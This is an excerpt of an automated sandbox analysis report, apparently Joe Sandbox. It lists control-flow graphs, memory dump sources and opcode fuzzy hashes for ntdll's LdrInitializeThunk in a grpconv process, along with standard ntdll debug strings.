• Instruction Fuzzy Hash: D190027160510403F50071584614786100A87D0249F61C815A0C1556CDC7A6DD5175F2

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 148 4ca2cf0-4ca2cfc LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 71e0442cc4cd54da6beec070707c08b4eafd97f9388952bfedc65f27e1ebd8b5
• Instruction ID: 10566bae0943117750a73eeebff1384930d4e367515e49f1d72ef3884bb6d34b
• Opcode Fuzzy Hash: 71e0442cc4cd54da6beec070707c08b4eafd97f9388952bfedc65f27e1ebd8b5
• Instruction Fuzzy Hash: 43900261242041537945B1584504587400B97E0289B91C416A1C05954CC537EC56E671

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 147 4ca2c30-4ca2c3c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 5005dd486b963a50c70e27b7205ac2502c20eda84b9c96f2fb9b02820c773f80
• Instruction ID: 8043d87be2997ed501604cffab3d36918ce6c786851d75e26893dfb21a2ddc01
• Opcode Fuzzy Hash: 5005dd486b963a50c70e27b7205ac2502c20eda84b9c96f2fb9b02820c773f80
• Instruction Fuzzy Hash: 4090026921300003F5807158550868A000A87D124AF91D819A080655CCC926DC696371

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 149 4ca2d10-4ca2d1c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3a0a3bb17b69fa1d66f5d91a5e3fd2ba0c552280ac428dd2122ccff9a4d25eae
• Instruction ID: 76f0f8973bddc7f6f0d5c2da24a61540adee1d11e4c36f184efe8356c94b5965
• Opcode Fuzzy Hash: 3a0a3bb17b69fa1d66f5d91a5e3fd2ba0c552280ac428dd2122ccff9a4d25eae
• Instruction Fuzzy Hash: 2190027120100413F51171584604787000E87D0289F91C816A0C1555CDD667DD52B171

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 150 4ca2e50-4ca2e5c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a66f1a4d6c9bf3b24d2ad41f7da5505b2b19172b21fe2e25d10e73acd307531f
• Instruction ID: 870d8ce9c5958c20d8ee1546c9a9fd36477edd0e6d229f614bcf5017afb00cf5
• Opcode Fuzzy Hash: a66f1a4d6c9bf3b24d2ad41f7da5505b2b19172b21fe2e25d10e73acd307531f
• Instruction Fuzzy Hash: 869002A134100443F50071584514B86000AC7E1349F51C419E1855558DC62ADC527176

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 151 4ca2f00-4ca2f0c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 134d7b831130d9ccb74a21adb89a59669e75b4ce55aaa84357bacf4507201328
• Instruction ID: 6c0eb573c99baf179fd27ee7230015291d2b3a4bcc7861ccc97f287998f9e528
• Opcode Fuzzy Hash: 134d7b831130d9ccb74a21adb89a59669e75b4ce55aaa84357bacf4507201328
                                                                                                                                                                                    • Instruction Fuzzy Hash: AC90026121180043F60075684D14B87000A87D034BF51C519A0945558CC926DC616571

Control-flow Graph

control_flow_graph 140 4ca29f0-4ca29fc LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: bce0b0ac9f93846d849de42e46e9be0025ce24fddcfb71af6533f2cd28d20b5d
• Instruction ID: da4b3fd44545791afe0bc115b9acd366b41a00e244d569b9a4b3b1ae4a9c5cd7
• Opcode Fuzzy Hash: bce0b0ac9f93846d849de42e46e9be0025ce24fddcfb71af6533f2cd28d20b5d
• Instruction Fuzzy Hash: B1900265211000032505B5580704587004B87D5399751C425F1806554CD632DC616171

Control-flow Graph

control_flow_graph 141 4ca2a80-4ca2a8c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6131906977082aaac076bb5b43f53ccd955920db8ef148193d8af26265ce6b9c
• Instruction ID: 24d8f4da53b5882090ea5585acf05781d512061e235e2eb3cfa36686d32c8c99
• Opcode Fuzzy Hash: 6131906977082aaac076bb5b43f53ccd955920db8ef148193d8af26265ce6b9c
• Instruction Fuzzy Hash: 4A9002A120200003650571584514696400F87E0249F51C425E1805594DC536DC917175

Control-flow Graph

control_flow_graph 146 4ca2bc0-4ca2bcc LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3faa3cb7752d39d6763a26c129917b79096d0c028f89148e1c2233dc4805dd7f
• Instruction ID: 29d5bb19095316289b9ef50c21dc42cda9f77f7597ffee0dfd5bc3c48f2f2084
• Opcode Fuzzy Hash: 3faa3cb7752d39d6763a26c129917b79096d0c028f89148e1c2233dc4805dd7f
• Instruction Fuzzy Hash: CF90027120100403F500759855086C6000A87E0349F51D415A5815559EC676DC917171

Control-flow Graph

control_flow_graph 144 4ca2b80-4ca2b8c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d736aa0296076460e343761e2645eb219bd98ba0f8056cb6ded8b1c181191165
• Instruction ID: 0675b2d4e46efbc676146eb1d8c2ec862c2e34e1f5abc25b411e8ea5a5330229
• Opcode Fuzzy Hash: d736aa0296076460e343761e2645eb219bd98ba0f8056cb6ded8b1c181191165
• Instruction Fuzzy Hash: 5890027120100843F50071584504BC6000A87E0349F51C41AA0915658DC626DC517571

Control-flow Graph

control_flow_graph 145 4ca2b90-4ca2b9c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 0efa319caf59da4f1d0b017c6cd43d402d31b653031dceaf1125d71731054911
• Instruction ID: e5e8e63debc1a17c95357c08e4b03e33f6feb7c8afca829401d7c763a21f9ccc
• Opcode Fuzzy Hash: 0efa319caf59da4f1d0b017c6cd43d402d31b653031dceaf1125d71731054911
• Instruction Fuzzy Hash: 7F90027120108803F510715885047CA000A87D0349F55C815A4C1565CDC6A6DC917171

Control-flow Graph

control_flow_graph 142 4ca2b00-4ca2b0c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 1f697d893676f2bf36e0e25d880c2995962bc67139b47c27c14550f84ae9170d
• Instruction ID: 0114e6bb6d1a587b14f5e4a7a79d7b81d73583089608f6efe9ac4c389541b3e7
• Opcode Fuzzy Hash: 1f697d893676f2bf36e0e25d880c2995962bc67139b47c27c14550f84ae9170d
• Instruction Fuzzy Hash: 0290027120504843F54071584504AC6001A87D034DF51C415A0855698DD636DD55B6B1

Control-flow Graph

control_flow_graph 143 4ca2b10-4ca2b1c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 7a041b50f1fa2cb0e21e24737290ff04d894f71360e90dd90d83b0d00e2d2fbe
• Instruction ID: 4785e8dcf0dea1448d4fa44f6e4a9e70c34c87ca2c78c54850c294967d384573
• Opcode Fuzzy Hash: 7a041b50f1fa2cb0e21e24737290ff04d894f71360e90dd90d83b0d00e2d2fbe
• Instruction Fuzzy Hash: 9D90027120100803F580715845046CA000A87D1349F91C419A0816658DCA26DE5977F1

Control-flow Graph
• Blocks: 136 4ca2b2a-4ca2b2f; 137 4ca2b3f-4ca2b46 (LdrInitializeThunk); 138 4ca2b31-4ca2b38
• Edges: 136->137, 136->138
APIs
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b4bfadae67a2dbf72b3fb1fde08649c11eb0fcbc331e4100feb4a1d05cf45e80
• Instruction ID: 30e2cbfe6e48acd1bda16c9a891ffef8eb64cd00db265c6750ebb6e5fbdf6a92
• Opcode Fuzzy Hash: b4bfadae67a2dbf72b3fb1fde08649c11eb0fcbc331e4100feb4a1d05cf45e80
• Instruction Fuzzy Hash: 50B02B718014C1C7FB00EB200708707390167C0308F11C051D1830280E4338D090F171
Strings
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04CD4530
• ExecuteOptions, xrefs: 04CD44AB
• Execute=1, xrefs: 04CD451E
• CLIENT(ntdll): Processing section info %ws..., xrefs: 04CD4592
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04CD4507
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04CD4460
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04CD454D
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: c5fbfd05b4446957bbfca75c4afc22cea0679825885ed76eef78c1456ce6a2f7
• Instruction ID: 6670ca26f42c2fc22b646c5cc701515d82f290948dc7e11702da342ff8aa32fa
• Opcode Fuzzy Hash: c5fbfd05b4446957bbfca75c4afc22cea0679825885ed76eef78c1456ce6a2f7
• Instruction Fuzzy Hash: 61511931A02219BAEF54AE95DC9DFE973EAEF44304F0804A9E605A7180EB70BF41DF54
Strings
Memory Dump Source
• Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 7e505c28c6938b34a6d18962826c6142b531ba78059b884d5af8a65bc41c71db
• Instruction ID: 2803d34c04c57d4d25f9427ca3f503c32b4f786906d200bc7a957da516055038
• Opcode Fuzzy Hash: 7e505c28c6938b34a6d18962826c6142b531ba78059b884d5af8a65bc41c71db
• Instruction Fuzzy Hash: 2E812DB1D002699BDB31DF54CC44BEEB7B9AB48714F0441DAE90AB7250E770AE84DFA1